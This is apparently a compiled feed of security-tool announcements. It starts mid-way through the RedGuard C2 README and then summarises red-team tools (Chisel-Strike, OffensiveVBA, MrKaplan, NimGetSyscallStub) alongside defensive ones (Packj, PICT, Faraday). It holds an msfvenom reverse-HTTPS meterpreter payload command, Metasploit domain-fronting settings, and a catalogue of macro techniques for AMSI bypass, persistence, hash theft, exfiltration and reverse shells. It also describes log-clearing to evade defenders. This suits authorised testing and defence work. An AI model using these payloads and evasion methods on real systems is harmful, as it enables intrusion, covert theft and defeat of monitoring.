$ msfvenom -p windows/meterpreter/reverse_https LHOST=vpsip LPORT=443 HttpHostHeader=360.com 
-f exe -o ~/path/to/payload.exe

Of course, as a domain fronting scenario, you can also configure your LHOST to use any domain name of the manufacturer's CDN, and pay attention to setting the HttpHostHeader to match RedGuard.

setg OverrideLHOST 360.com
setg OverrideLPORT 443
setg OverrideRequestHost true

It is important to note that the OverrideRequestHost setting must be set to true. This is due to a quirk in the way Metasploit handles incoming HTTP/S requests by default when generating configuration for staging payloads. By default, Metasploit uses the incoming request's Host header value (if present) for second-stage configuration instead of the LHOST parameter. Therefore, the build stage is configured to send requests directly to your hidden domain name because CloudFront passes your internal domain in the Host header of forwarded requests. This is clearly not what we are asking for. Using the OverrideRequestHost configuration value, we can force Metasploit to ignore the incoming Host header and instead use the LHOST configuration value pointing to the origin CloudFront domain.

The listener is set to the actual line port that matches the address RedGuard actually forwards to.

 

RedGuard received the request:


0x05 Loading

Thank you for your support. RedGuard will continue to improve and update it. I hope that RedGuard can be known to more security practitioners. The tool refers to the design ideas of RedWarden.

**We welcome everyone to put forward your needs, RedGuard will continue to grow and improve in these needs! **

About the developer 风起 related articles:https://www.anquanke.com/member.html?memberId=148652

2022Kcon Author of the weapon spectrum of the hacker conference

The 10th ISC Internet Security Conference Advanced Offensive and Defense Forum "C2 Front Flow Control" topic

https://isc.n.cn/m/pages/live/index?channel_id=iscyY043&ncode=UR6KZ&room_id=1981905&server_id=785016&tab_id=253

Analysis of cloud sandbox flow identification technology

https://www.anquanke.com/post/id/277431

Realization of JARM Fingerprint Randomization Technology

https://www.anquanke.com/post/id/276546

Kunyu: https://github.com/knownsec/Kunyu

风起于青萍之末,浪成于微澜之间。

0x06 Community

If you have any questions or requirements, you can submit an issue under the project, or contact the tool author by adding WeChat.




Chisel-Strike - A .NET XOR Encrypted Cobalt Strike Aggressor Implementation For Chisel To Utilize Faster Proxy And Advanced Socks5 Capabilities


A .NET XOR encrypted cobalt strike aggressor implementation for chisel to utilize faster proxy and advanced socks5 capabilities.


Why write this?

In my experience I found socks4/socks4a proxies quite slow in comparison to its socks5 counterparts and a lack of implementation of socks5 in most C2 frameworks. There is a C# wrapper around the go version of chisel called SharpChisel. This wrapper has a few issues and isn't maintained to the latest version of chisel. It didn’t allow using shellcode with donut, reflectio n methods or execute-assembly. I found a fix for this using the SharpChisel-NG project.

Since the SharpChisel assembly is around 16.7 MB, execute-assembly(has a hidden size limitation of 1 MB) and similar in memory methods wouldn’t work. To maintain most of the execution in memory I incorporated the NetLoader project by Flangvik which is executed via execute-assembly to reflectively host and load a XOR encrypted version of SharpChisel with base64 arguments in memory.

As an alternative, it is also possible to implement similar C# proxies like SharpSocks by replacing the appropriate chisel binaries in the project.

Setup

Note: If using a Windows teamserver skip steps 2 and 3.

  1. Clone/download the repository: git clone https://github.com/m3rcer/Chisel-Strike.git

  2. Make all binaries executable:

  • cd Chisel-Strike

  • chmod +x -R chisel-modules

  • chmod +x -R tools

  1. Install Mingw-w64 and mono:
  • sudo apt-get install mingw-w64

  • sudo apt install mono-complete

  1. Import ChiselStrike.cna in cobalt strike using the Script Manager

Recompile binaries from the src folder if needed.

Usage

chisel can be executed on both the teamserver (windows/linux) and the beacon. With either acting as the server/client. A normal execution flow would be to setup a chisel server on the teamserver and create a client on the beacon connecting back to the teamserver.

Commands

  1. chisel <client/server> <command>: Run Chisel on a beacon

  2. chisel-tms <client/server> <command>: Run Chisel on your teamserver

  3. chisel-enc: XOR Encrypt SharpChisel.exe with a password of choice

  4. chisel-jobs: List active chisel jobs on the teamserver and beacon

  5. chisel-kill: Kill active chisel jobs on a beacon

  6. chisel-tms-kill: Kill active chisel jobs on teamserver

Example

OPSEC

NetLoader can easily be obfuscated and used to bypass defender using projects like NimCrypt2 and the like.

Yet SharpChisel.exe drops a dll on disk due to the use of Costura/Fody packages at a location similar to: C:\Users\m3rcer\AppData\Local\Temp\Costura\CB9433C24E75EC539BF34CD1AA12B236\64\main.dll which is detected by defender. It is advised to obfuscate chisel dll's using projects like gobfuscate in the SharpChisel-NG project and re-build new SharpChisel-NG binaries as shown here.

TODO

  • Figure a way to avoid SharpChisel dropping main.dll on disk / Create a new C# wrapper for chisel.

  • Create a method to parse command output for the chisel-tms command.

Credits



NimGetSyscallStub - Get Fresh Syscalls From A Fresh Ntdll.Dll Copy


Get fresh Syscalls from a fresh ntdll.dll copy. This code can be used as an alternative to the already published awesome tools NimlineWhispers and NimlineWhispers2 by @ajpc500 or ParallelNimcalls.


The advantage of grabbing Syscalls dynamically is, that the signature of the Stubs is not included in the file and you don't have to worry about changing Windows versions.

To compile the shellcode execution template run the following:

nim c -d:release ShellcodeInject.nim

The result should look like this:



OffensiveVBA - Code Execution And AV Evasion Methods For Macros In Office Documents


In preparation for a VBS AV Evasion Stream/Video I was doing some research for Office Macro code execution methods and evasion techniques.

The list got longer and longer and I found no central place for offensive VBA templates - so this repo can be used for such. It is very far away from being complete. If you know any other cool technique or useful template feel free to contribute and create a pull request!

Most of the templates in this repo were already published somewhere. I just copy pasted most templates from ms-docs sites, blog posts or from other tools.


Templates in this repo

File Description
ShellApplication_ShellExecute.vba Execute an OS command via ShellApplication object and ShellExecute method
ShellApplication_ShellExecute_privileged.vba Execute an privileged OS command via ShellApplication object and ShellExecute method - UAC prompt
Shellcode_CreateThread.vba Execute shellcode in the current process via Win32 CreateThread
Shellcode_EnumChildWindowsCallback.vba Execute shellcode in the current process via EnumChildWindows
Win32_CreateProcess.vba Create a new process for code execution via Win32 CreateProcess function
Win32_ShellExecute.vba Create a new process for code execution via Win32 ShellExecute function
WMI_Process_Create.vba Create a new process via WMI for code execution
WMI_Process_Create2.vba Another WMI code execution example
WscriptShell_Exec.vba Execute an OS command via WscriptShell object and Exec method
WscriptShell_run.vba Execute an OS command via WscriptShell object and Run method
VBA-RunPE @itm4n's RunPE technique in VBA
GadgetToJScript med0x2e's C# script for generating .NET serialized gadgets that can trigger .NET assembly load/execution when deserialized using BinaryFormatter from JS/VBS/VBA based scripts.
PPID_Spoof.vba christophetd's spoofing-office-macro copy
AMSIBypass_AmsiScanBuffer_ordinal.vba rmdavy's AMSI Bypass to patch AmsiScanBuffer using ordinal values for a signature bypass
AMSIBypass_AmsiScanBuffer_Classic.vba rasta-mouse's classic AmsiScanBuffer patch
AMSIBypass_Heap.vba rmdavy's HeapsOfFun repo copy
AMSIbypasses.vba outflanknl's AMSI bypass blog
COMHijack_DLL_Load.vba Load DLL via COM Hijacking
COM_Process_create.vba Create process via COM object
Download_Autostart.vba Download a file from a remote webserver and put it into the StartUp folder
Download_Autostart_WinAPI.vba Download a file from a remote webserver via URLDownloadtoFileA and put it into the StartUp folder
Dropper_Autostart.vba Drop batch file into the StartUp folder
Registry_Persist_wmi.vba Create StartUp registry key for persistence via WMI
Registry_Persist_wscript.vba Create StartUp registry key for persistence via wscript object
ScheduledTask_Create.vba Create and start sheduled task for code execution/persistence
XMLDOM_Load_XSL_Process_create.vba Load XSL from a remote webserver to execute code
regsvr32_sct_DownloadExecute.vba Execute regsvr32 to download a remote webservers SCT file for code execution
BlockETW.vba Patch EtwEventWrite in ntdll.dll to block ETW data collection
BlockETW_COMPLUS_ETWEnabled_ENV.vba Block ETW data collection by setting the environment variable COMPLUS_ETWEnabled to 0, credit to @xpn
ShellWindows_Process_create.vba ShellWindows Process create to get explorer.exe as parent process
AES.vba An example to use AES encryption/decryption in VBA from Here
Dropper_Executable_Autostart.vba Get executable bytes from VBA and drop into Autostart - no download in this case
MarauderDrop.vba Drop a COM registered .NET DLL into temp, import the function and execute code - in this case loads a remote C# binary from a webserver to memory and executes it - credit to @Jean_Maes_1994 for MaraudersMap
Dropper_Workfolders_lolbas_Execute.vba Drop an embedded executable into the TEMP directory and execute it using C:\windows\system32\Workfolders.exe as LOLBAS - credit to @YoSignals
SandBoxEvasion Some SandBox Evasion templates
Evasion Dropper Autostart.vba Drops a file to the Startup directory bypassing file write monitoring via renamed folder operation
Evasion MsiInstallProduct.vba Installs a remote MSI package using WindowsInstaller ActiveXObject avoiding spawning suspicious office child process, the msi installation will be executed as a child of the MSIEXEC /V service
StealNetNTLMv2.vba Steal NetNTLMv2 Hash via share connection - credit to https://book.hacktricks.xyz/windows/ntlm/places-to-steal-ntlm-creds
Parse-Outlook.vba Parses Outlook for sensitive keywords and file extensions, and exfils them via email - credit to JohnWoodman
Reverse-Shell.vba Reverse shell written entirely in VBA using Windows API calls - credit to JohnWoodman

Missing - ToDos

File Description
Unhooker.vba Unhook API's in memory to get rid of hooks
Syscalls.vba Syscall usage - fresh from disk or Syswhispers like
Manymore.vba If you have any more ideas feel free to contribute

Obfuscators / Payload generators

  1. VBad
  2. wePWNise
  3. VisualBasicObfuscator - needs some modification as it doesn't split up lines and is therefore not usable for office document macros
  4. macro_pack
  5. shellcode2vbscript.py
  6. EvilClippy
  7. OfficePurge
  8. SharpShooter
  9. VBS-Obfuscator-in-Python - - needs some modification as it doesn't split up lines and is therefore not usable for office document macros

Credits / usefull resources

ASR bypass: http://blog.sevagas.com/IMG/pdf/bypass_windows_defender_attack_surface_reduction.pdf

Shellcode to VBScript conversion: https://github.com/DidierStevens/DidierStevensSuite/blob/master/shellcode2vbscript.py

Bypass AMSI in VBA: https://outflank.nl/blog/2019/04/17/bypassing-amsi-for-vba/

VBA purging: https://www.mandiant.com/resources/purgalicious-vba-macro-obfuscation-with-vba-purging

F-Secure VBA Evasion and detection post: https://blog.f-secure.com/dechaining-macros-and-evading-edr/

One more F-Secure blog: https://labs.f-secure.com/archive/dll-tricks-with-vba-to-improve-offensive-macro-capability/



Faraday Community - Open Source Penetration Testing and Vulnerability Management Platform


Faraday was built from within the security community, to make vulnerability management easier and enhance our work. What IDEs are to programming, Faraday is to pentesting.

Offensive security had two difficult tasks: designing smart ways of getting new information, and keeping track of findings to improve further work.

This new update brings: New scanning, reporting and UI experience


Focus on pentesting

Get your work organized and focus on what you do best. With Faradaycommunity, you may focus on pentesting while we help you with the rest..

Check out the documentation here.

Installation

The easiest way to get faraday up and running is using our docker-compose

# Docker-compose

$ wget https://raw.githubusercontent.com/infobyte/faraday/master/docker-compose.yaml

$ docker-compose up

Manage your findings

Manage, classify and triage your results through Faraday’s dashboard, designed with and for pentesters.

Get an overview of your vulnerabilities and ease your work.




By right clicking on any vulnerability, you may filter, tag and classify your results with ease. You may also add comments to vulnerabilities and add evidence with just a few clicks



In the asset tab, information on each asset is presented, for a detailed follow-up on every device in your network. This insight might be especially useful if you hold critical data on certain assets, so the impact of vulnerabilities may be assessed through this information. If responsibilities over each asset are clear, this view helps to organize and follow the work of asset owners too.

Here, you can obtain information about the OS, services, ports and vulnerabilities associated with each of your assets, which will give you a better understanding of your scope and help you to gain an overview of what you are assessing.




Use your favorite tools

Integrate scanners with Faraday Agents Dispatcher. This feature will allow you to orchestrate the most common used security tools and have averything available from your Faraday instance. Once your scan is finished, you will be able to see all the results in the main dashboard.


Choose the scanners that best fit your needs.



Share your results

Once you’re done, export your results in a CSV format.

Check out some of our features

Full centralization

With Faraday, you may oversee your cybersecurity efforts, prioritize actions and manage your resources from a single platform.

Elegant integration of scanning tools

Make sense of today’s overwhelming number of tools. Faraday’s technology aligns +80 key plugins with your current needs, normalizing and deduplicating vulnerabilities.

Powerful Automation

Save time by automating pivotal steps of Vulnerability Management. Scan, create reports, and schedule pipelines of custom actions, all following your requirements.

Intuitive dashboard

Faraday’s intuitive dashboard guides teams through vulnerability management with ease. Scan, analyze, automate, tag, and prioritize, each with just a few clicks.

Smart visibility

Get full visibility of your security posture in real-time. Advanced filters, navigation, and analytics help you strategize and focus your work.

Easier teamwork

Coordinate efforts by sending tickets to Jira, Gitlab, and ServiceNow directly from Faraday.

Planning ahead

Manage your security team with Faraday planner. Keep up by communicating with your peers and receiving notifications.

Work as usual, but better

Get your work organized on the run when pentesting with Faraday CLI.

Proudly Open Source

We believe in the power of teams, most of our integrations and core technologies are open source, allowing any team to build custom implementations and integrations.

For more information check out our website www.faradaysec.com


Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution


Time for another Kali Linux release! – Kali Linux 2022.3. This release has various impressive updates.

The highlights for Kali’s 2022.3’s release:

For more details, see the bug tracker changelog.


More info here.


Packj - Large-Scale Security Analysis Platform To Detect Malicious/Risky Open-Source Packages


Packj (pronounced package) is a command line (CLI) tool to vet open-source software packages for "risky" attributes that make them vulnerable to supply chain attacks. This is the tool behind our large-scale security analysis platform Packj.dev that continuously vets packages and provides free reports.


How to use

Packj accepts two input args:

  • name of the registry or package manager, pypi, npm, or rubygems.
  • name of the package to be vetted

Packj supports vetting of PyPI, NPM, and RubyGems packages. It performs static code analysis and checks for several metadata attributes such as release timestamps, author email, downloads, dependencies. Packages with expired email domains, large release time gap, sensitive APIs, etc. are flagged as risky for security reasons.

Packj also analyzes public repo code as well as metadata (e.g., stars, forks). By comparing the repo description and package title, you can be sure if the package indeed has been created from the repo to mitigate any starjacking attacks.

Containerized

The best way to use Packj is to run it inside Docker (or Podman) container. You can pull our latest image from DockerHub to get started.

docker pull ossillate/packj:latest

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest npm browserify
[+] Fetching 'browserify' from npm...OK [ver 17.0.0]
[+] Checking version...ALERT [598 days old]
[+] Checking release history...OK [484 version(s)]
[+] Checking release time gap...OK [68 days since last release]
[+] Checking author...OK [mail@substack.net]
[+] Checking email/domain validity...ALERT [expired author email domain]
[+] Checking readme...OK [26838 bytes]
[+] Checking homepage...OK [https://github.com/browserify/browserify#readme]
[+] Checking downloads...OK [2.2M weekly]
[+] Checking repo_url URL...OK [https://github.com/browserify/browserify]
[+] Checking repo data...OK [stars: 14077, forks: 1236]
[+] Checking repo activity...OK [commits: 2290, contributors: 207, tags: 413]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [48 found]
[+] Downloading package 'browserify' (ver 17. 0.0) from npm...OK [163.83 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,file,codegen]
[+] Checking files/funcs...OK [429 files (383 .js), 744 funcs, LoC: 9.7K]
=============================================
[+] 5 risk(s) found, package is undesirable!
=> Complete report: /tmp/npm-browserify-17.0.0.json
{
"undesirable": [
"old package: 598 days old",
"invalid or no author email: expired author email domain",
"generates new code at runtime",
"reads files and dirs",
"forks or exits OS processes",
]
}

Specific package versions to be vetted could be specified using ==. Please refer to the example below

$ docker run --mount type=bind,source=/tmp,target=/tmp ossillate/packj:latest pypi requests==2.18.4
[+] Fetching 'requests' from pypi...OK [ver 2.18.4]
[+] Checking version...ALERT [1750 days old]
[+] Checking release history...OK [142 version(s)]
[+] Checking release time gap...OK [14 days since last release]
[+] Checking author...OK [me@kennethreitz.org]
[+] Checking email/domain validity...OK [me@kennethreitz.org]
[+] Checking readme...OK [49006 bytes]
[+] Checking homepage...OK [http://python-requests.org]
[+] Checking downloads...OK [50M weekly]
[+] Checking repo_url URL...OK [https://github.com/psf/requests]
[+] Checking repo data...OK [stars: 47547, forks: 8758]
[+] Checking repo activity...OK [commits: 6112, contributors: 725, tags: 144]
[+] Checking for CVEs...ALERT [2 found]
[+] Checking dependencies...OK [9 direct]
[+] Downloading package 'requests' (ver 2.18.4) from pypi...OK [123.27 KB]
[+ ] Analyzing code...ALERT [needs 4 perms: codegen,process,file,network]
[+] Checking files/funcs...OK [47 files (33 .py), 578 funcs, LoC: 13.9K]
=============================================
[+] 6 risk(s) found, package is undesirable, vulnerable!
{
"undesirable": [
"old package: 1744 days old",
"invalid or no homepage: insecure webpage",
"generates new code at runtime",
"fetches data over the network",
"reads files and dirs",
],
"vulnerable": [
"contains CVE-2018-18074,CVE-2018-18074"
]
}
=> Complete report: /tmp/pypi-requests-2.18.4.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/requests/2.18.4

Non-containerized

Alternatively, you can install Python/Ruby dependencies locally and test it.

NOTE

  • Packj has only been tested on Linux.
  • Requires Python3 and Ruby. API analysis will fail if used with Python2.
  • You will have to install Python and Ruby dependencies before using the tool:
    • pip install -r requirements.txt
    • gem install google-protobuf:3.21.2 rubocop:1.31.1
$ python3 main.py npm eslint
[+] Fetching 'eslint' from npm...OK [ver 8.16.0]
[+] Checking version...OK [10 days old]
[+] Checking release history...OK [305 version(s)]
[+] Checking release time gap...OK [15 days since last release]
[+] Checking author...OK [nicholas+npm@nczconsulting.com]
[+] Checking email/domain validity...OK [nicholas+npm@nczconsulting.com]
[+] Checking readme...OK [18234 bytes]
[+] Checking homepage...OK [https://eslint.org]
[+] Checking downloads...OK [23.8M weekly]
[+] Checking repo_url URL...OK [https://github.com/eslint/eslint]
[+] Checking repo data...OK [stars: 20669, forks: 3689]
[+] Checking repo activity...OK [commits: 8447, contributors: 1013, tags: 302]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...ALERT [35 found]
[+] Downloading package 'eslint' (ver 8.16.0) from npm...OK [490.14 KB]
[+] Analyzing code...ALERT [needs 2 perms: codegen,file]
[+ ] Checking files/funcs...OK [395 files (390 .js), 1022 funcs, LoC: 76.3K]
=============================================
[+] 2 risk(s) found, package is undesirable!
{
"undesirable": [
"generates new code at runtime",
"reads files and dirs: ['package/lib/cli-engine/load-rules.js:37', 'package/lib/cli-engine/file-enumerator.js:142']"
]
}
=> Complete report: /tmp/npm-eslint-8.16.0.json

How it works

  • It first downloads the metadata from the registry using their APIs and analyze it for "risky" attributes.
  • To perform API analysis, the package is downloaded from the registry using their APIs into a temp dir. Then, packj performs static code analysis to detect API usage. API analysis is based on MalOSS, a research project from our group at Georgia Tech.
  • Vulnerabilities (CVEs) are checked by pulling info from OSV database at OSV
  • Python PyPI and NPM package downloads are fetched from pypistats and npmjs
  • All risks detected are aggregated and reported

Risky attributes

The design of Packj is guided by our study of 651 malware samples of documented open-source software supply chain attacks. Specifically, we have empirically identified a number of risky code and metadata attributes that make a package vulnerable to supply chain attacks.

For instance, we flag inactive or unmaintained packages that no longer receive security fixes. Inspired by Android app runtime permissions, Packj uses a permission-based security model to offer control and code transparency to developers. Packages that invoke sensitive operating system functionality such as file accesses and remote network communication are flagged as risky as this functionality could leak sensitive data.

Some of the attributes we vet for, include

Attribute Type Description Reason
Release date Metadata Version release date to flag old or abandonded packages Old or unmaintained packages do not receive security fixes
OS or lang APIs Code Use of sensitive APIs, such as exec and eval Malware uses APIs from the operating system or language runtime to perform sensitive operations (e.g., read SSH keys)
Contributors' email Metadata Email addresses of the contributors Incorrect or invalid of email addresses suggest lack of 2FA
Source repo Metadata Presence and validity of public source repo Absence of a public repo means no easy way to audit or review the source code publicly

Full list of the attributes we track can be viewed at threats.csv

These attributes have been identified as risky by several other researchers [1, 2, 3] as well.

How to customize

Packj has been developed with a goal to assist developers in identifying and reviewing potential supply chain risks in packages.

However, since the degree of perceived security risk from an untrusted package depends on the specific security requirements, Packj can be customized according to your threat model. For instance, a package with no 2FA may be perceived to pose greater security risks to some developers, compared to others who may be more willing to use such packages for the functionality offered. Given the volatile nature of the problem, providing customized and granular risk measurement is one of our goals.

Packj can be customized to minimize noise and reduce alert fatigue by simply commenting out unwanted attributes in threats.csv

Malware found

We found over 40 malicious packages on PyPI using this tool. A number of them been taken down. Refer to an example below:

$ python3 main.py pypi krisqian
[+] Fetching 'krisqian' from pypi...OK [ver 0.0.7]
[+] Checking version...OK [256 days old]
[+] Checking release history...OK [7 version(s)]
[+] Checking release time gap...OK [1 days since last release]
[+] Checking author...OK [KrisWuQian@baidu.com]
[+] Checking email/domain validity...OK [KrisWuQian@baidu.com]
[+] Checking readme...ALERT [no readme]
[+] Checking homepage...OK [https://www.bilibili.com/bangumi/media/md140632]
[+] Checking downloads...OK [13 weekly]
[+] Checking repo_url URL...OK [None]
[+] Checking for CVEs...OK [none found]
[+] Checking dependencies...OK [none found]
[+] Downloading package 'KrisQian' (ver 0.0.7) from pypi...OK [1.94 KB]
[+] Analyzing code...ALERT [needs 3 perms: process,network,file]
[+] Checking files/funcs...OK [9 files (2 .py), 6 funcs, LoC: 184]
=============================================
[+] 6 risk(s) found, package is undes irable!
{
"undesirable": [
"no readme",
"only 45 weekly downloads",
"no source repo found",
"generates new code at runtime",
"fetches data over the network: ['KrisQian-0.0.7/setup.py:40', 'KrisQian-0.0.7/setup.py:50']",
"reads files and dirs: ['KrisQian-0.0.7/setup.py:59', 'KrisQian-0.0.7/setup.py:70']"
]
}
=> Complete report: pypi-KrisQian-0.0.7.json
=> View pre-vetted package report at https://packj.dev/package/PyPi/KrisQian/0.0.7

Packj flagged KrisQian (v0.0.7) as suspicious due to absence of source repo and use of sensitive APIs (network, code generation) during package installation time (in setup.py). We decided to take a deeper look, and found the package malicious. Please find our detailed analysis at https://packj.dev/malware/krisqian.

More examples of malware we found are listed at https://packj.dev/malware Please reach out to us at oss@ossillate.com for full list.

Resources

To learn more about Packj tool or open-source software supply chain attacks, refer to our

The vetting tool <g-emoji alias=rocket class=g-emoji fallback-src=https://github.githubassets.com/images/icons/emoji/unicode/1f680.png>&#128640;</g-emoji> behind our large-scale security analysis platform to detect malicious/risky open-source packages (7)

Upcoming talks

Feature roadmap

  • Add support for other language ecosystems. Rust is a work in progress, and will be available in July '22 (last week).
  • Add functionality to detect several other "risky" code as well as metadata attributes.
  • Packj currently only performs static code analysis, we are working on adding support for dynamic analysis (WIP, ETA: end of summer)

Team

Packj has been developed by Cybersecurity researchers at Ossillate Inc. and external collaborators to help developers mitigate risks of supply chain attacks when sourcing untrusted third-party open-source software dependencies. We thank our developers and collaborators.

We welcome code contributions. Join our discord community for discussion and feature requests.

FAQ

  • What Package Managers (Registries) are supported?

Packj can currently vet NPM, PyPI, and RubyGems packages for "risky" attributes. We are adding support for Rust.

  • Does it work on obfuscated calls? For example, a base 64 encrypted string that gets decrypted and then passed to a shell?

This is a very common malicious behavior. Packj detects code obfuscation as well as spawning of shell commands (exec system call). For example, Packj can flag use of getattr() and eval() API as they indicate "runtime code generation"; a developer can go and take a deeper look then. See main.py for details.

  • Does this work at the system call level, where it would detect e.g. any attempt to open ~/.aws/credentials, or does it rely on heuristic analysis of the code itself, which will always be able to be "coded around" by the malware authors?

Packj currently uses static code analysis to derive permissions (e.g., file/network accesses). Therefore, it can detect open() calls if used by the malware directly (e.g., not obfuscated in a base64 encoded string). But, Packj can also point out such base64 decode calls. Fortunately, malware has to use these APIs (read, open, decode, eval, etc.) for their functionality -- there's no getting around. Having said that, a sophisticated malware can hide itself better, so dynamic analysis must be performed for completeness. We are incorporating strace-based dynamic analysis (containerized) to collect system calls. See roadmap for details.



MrKaplan - Tool Aimed To Help Red Teamers To Stay Hidden By Clearing Evidence Of Execution


MrKaplan is a tool aimed to help red teamers to stay hidden by clearing evidence of execution. It works by saving information such as the time it ran, snapshot of files and associate each evidence to the related user.

This tool is inspired by MoonWalk, a similar tool for Unix machines.

You can read more about it in the wiki page.


Features

  • Stopping event logging.
  • Clearing files artifacts.
  • Clearing registry artifacts.
  • Can run for multiple users.
  • Can run as user and as admin (Highly recommended to run as admin).
  • Can save timestamps of files.
  • Can exclude certian operations and leave artifacts to blue teams.

Usage

  • Before you start your operations on the computer, run MrKaplan with begin flag and whenever your finish run it again with end flag.
  • DO NOT REMOVE MrKaplan registry key, otherwise MrKaplan will not be able to use the information.

IOCs

  • Powershell process that access to the artifacts mentioned in the wiki page.

  • Powershell importing weird base64 blob.

  • Powershell process that performs Token Manipulation.

  • MrKaplan's registry key: HKCU:\Software\MrKaplan.

Acknowledgements

Disclaimer

I'm not responsible in any way for any kind of damage that is done to your computer / program as cause of this project. I'm happily accept contribution, make a pull request and I will review it!



Smap - A Drop-In Replacement For Nmap Powered By Shodan.Io


Smap is a replica of Nmap which uses shodan.io's free API for port scanning. It takes same command line arguments as Nmap and produces the same output which makes it a drop-in replacament for Nmap.


Features

  • Scans 200 hosts per second
  • Doesn't require any account/api key
  • Vulnerability detection
  • Supports all nmap's output formats
  • Service and version fingerprinting
  • Makes no contact to the targets

Installation

Binaries

You can download a pre-built binary from here and use it right away.

Manual

go install -v github.com/s0md3v/smap/cmd/smap@latest

Confused or something not working? For more detailed instructions, click here

AUR pacakge

Smap is available on AUR as smap-git (builds from source) and smap-bin (pre-built binary).

Homebrew/Mac

Smap is also avaible on Homebrew.

brew update
brew install smap

Usage

Smap takes the same arguments as Nmap but options other than -p, -h, -o*, -iL are ignored. If you are unfamiliar with Nmap, here's how to use Smap.

Specifying targets

smap 127.0.0.1 127.0.0.2

You can also use a list of targets, seperated by newlines.

smap -iL targets.txt

Supported formats

1.1.1.1         // IPv4 address
example.com // hostname
178.23.56.0/8 // CIDR

Output

Smap supports 6 output formats which can be used with the -o* as follows

smap example.com -oX output.xml

If you want to print the output to terminal, use hyphen (-) as filename.

Supported formats

oX    // nmap's xml format
oG // nmap's greppable format
oN // nmap's default format
oA // output in all 3 formats above at once
oP // IP:PORT pairs seperated by newlines
oS // custom smap format
oJ // json

Note: Since Nmap doesn't scan/display vulnerabilities and tags, that data is not available in nmap's formats. Use -oS to view that info.

Specifying ports

Smap scans these 1237 ports by default. If you want to display results for certain ports, use the -p option.

smap -p21-30,80,443 -iL targets.txt

Considerations

Since Smap simply fetches existent port data from shodan.io, it is super fast but there's more to it. You should use Smap if:

You want

  • vulnerability detection
  • a super fast port scanner
  • results for most common ports (top 1237)
  • no connections to be made to the targets

You are okay with

  • not being able to scan IPv6 addresses
  • results being up to 7 days old
  • a few false negatives


BlackStone - Pentesting Reporting Tool

Pentesting Reporting Tool (1)


BlackStone project or "BlackStone Project" is a tool created in order to automate the work of drafting and submitting a report on audits of ethical hacking or pentesting.

In this tool we can register in the database the vulnerabilities that we find in the audit, classifying them by internal, external audit or wifi, in addition, we can put your description and recommendation, as well as the level of severity and effort for its correction. This information will then help us generate in the report a criticality table as a global summary of the vulnerabilities found.

We can also register a company and, just by adding its web page, the tool will be able to find subdomains, telephone numbers, social networks, employee emails...


Pentesting Reporting Tool (2)

Docker Install

Install Docker

Install docker-compose
Install BlackStone
git clone https://github.com/micro-joan/BlackStone
cd BlackStone
docker-compose up -d

User: blackstone

Password: blackstone

Manual Install

  • First we must download an Apache server to host the tool, in my case I use Mamp (I recommend following these steps): https://www.mamp.info/en/downloads/
  • We will download the content of this repository and we will have 2 folders (BlackStone and BBDD)
  • Once the server starts we will go to c://MAMP/htdocs and paste all the contents of the downloaded folder "BlackStone"
  • For the application to work we will have to import the database, we will go to our browser and write "localhost/phpMyAdmin/", you have the database connection file in the folder BlackStone/conexion.php
  • We will create a database called blackstone and import the data from the downloaded BBDD folder
  • Log in to BlackStone with the username and password "blackstone"

Use

First you need to go to profile settings and add Hunter.io and haveibeenpwned.com tokens:

Pentesting Reporting Tool (3)

After having vulnerabilities in the database, we will go to the audited client and we will register a client along with their web page, once registered we can go to customer details and we can see the following information:

THE USE OF THIS APPLICATION IS FOR PROFESSIONAL USE, THE AUTHOR IS NOT RESPONSIBLE FOR A MISUSE EMPLOYED

  • Name of business owner
  • Social networks of the company owner
  • Email and telephone number of the owner of the company
  • Exposed password check on the company owner's deep web
  • Subdomains of the website as well as information of interest found in google
  • Emails of company workers

Pentesting Reporting Tool (4)

Once we have the company that we are going to audit registered in the database, we will create a report, adding the date, name of the report and the company to which will be audited. When we register the report, we will give it edit and then we will select the vulnerabilities that we want to appear in the report:

Pentesting Reporting Tool (5)

Finally, we will generate the report by clicking on the "overview report" button, and later we will save the page that is generated as ".mht", then we will open it with Word to be able to work on the generated report:

Pentesting Reporting Tool (6)



Pict - Post-Infection Collection Toolkit


This set of scripts is designed to collect a variety of data from an endpoint thought to be infected, to facilitate the incident response process. This data should not be considered to be a full forensic data collection, but does capture a lot of useful forensic information.

If you want true forensic data, you should really capture a full memory dump and image the entire drive. That is not within the scope of this toolkit.


How to use

The script must be run on a live system, not on an image or other forensic data store. It does not strictly require root permissions to run, but it will be unable to collect much of the intended data without.

Data will be collected in two forms. First is in the form of summary files, containing output of shell commands, data extracted from databases, and the like. For example, the browser module will output a browser_extensions.txt file with a summary of all the browser extensions installed for Safari, Chrome, and Firefox.

The second are complete files collected from the filesystem. These are stored in an artifacts subfolder inside the collection folder.

Syntax

The script is very simple to run. It takes only one parameter, which is required, to pass in a configuration script in JSON format:

./pict.py -c /path/to/config.json

The configuration script describes what the script will collect, and how. It should look something like this:

collection_dest

This specifies the path to store the collected data in. It can be an absolute path or a path relative to the user's home folder (by starting with a tilde). The default path, if not specified, is /Users/Shared.

Data will be collected in a folder created in this location. That folder will have a name in the form PICT-computername-YYYY-MM-DD, where the computer name is the name of the machine specified in System Preferences > Sharing and date is the date of collection.

all_users

If true, collects data from all users on the machine whenever possible. If false, collects data only for the user running the script. If not specified, this value defaults to true.

collectors

PICT is modular, and can easily be expanded or reduced in scope, simply by changing what Collector modules are used.

The collectors data is a dictionary where the key is the name of a module to load (the name of the Python file without the .py extension) and the value is the name of the Collector subclass found in that module. You can add additional entries for custom modules (see Writing your own modules), or can remove entries to prevent those modules from running. One easy way to remove modules, without having to look up the exact names later if you want to add them again, is to move them into a top-level dictionary named unused.

settings

This dictionary provides global settings.

keepLSData specifies whether the lsregister.txt file - which can be quite large - should be kept. (This file is generated automatically and is used to build output by some other modules. It contains a wealth of useful information, but can be well over 100 MB in size. If you don't need all that data, or don't want to deal with that much data, set this to false and it will be deleted when collection is finished.)

zipIt specifies whether to automatically generate a zip file with the contents of the collection folder. Note that the process of zipping and unzipping the data will change some attributes, such as file ownership.

moduleSettings

This dictionary specifies module-specific settings. Not all modules have their own settings, but if a module does allow for its own settings, you can provide them here. In the above example, you can see a boolean setting named collectArtifacts being used with the browser module.

There are also global module settings that are maintained by the Collector class, and that can be set individually for each module.

